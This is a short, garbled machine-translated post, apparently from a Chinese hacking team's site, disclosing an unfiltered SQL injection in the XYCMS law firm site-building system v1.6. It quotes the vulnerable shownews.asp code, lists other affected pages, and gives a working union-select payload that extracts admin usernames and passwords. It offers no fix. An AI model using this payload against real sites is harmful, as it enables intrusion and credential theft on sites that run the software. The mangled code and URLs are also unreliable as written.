Author: Liuker www.anying.org must indicate the website and author of The Shadow Technical Team
Just now, I was bored with downloading the audit, but I have read a little bit about it. There are too many vulnerabilities. Ps: it is a bit similar to a forum article with a contribution
Lewd split line ------------------------------------------------------ audit version: XYCMS law firm site building system v1.6 (other versions of self-testing) Source Code address: http://down.chinaz.com/soft/29233.htm vulnerability file: shownews. asp Vulnerability code: 7-13 lines
<% Id = request. queryString ("id") set snews = server. createobject ("adodb. recordset ") exec =" select * from [news] where id = "& idsnews. open exec, conn, 1,1%>
None of the filters directly cause injection points: http: // 127.0.0.1: 99/shownews. asp? Id = xx other files with the same vulnerability: showdxal. asp, showfwly. asp, etc. Find exp: union select 1, admin, password, 7 from admin_user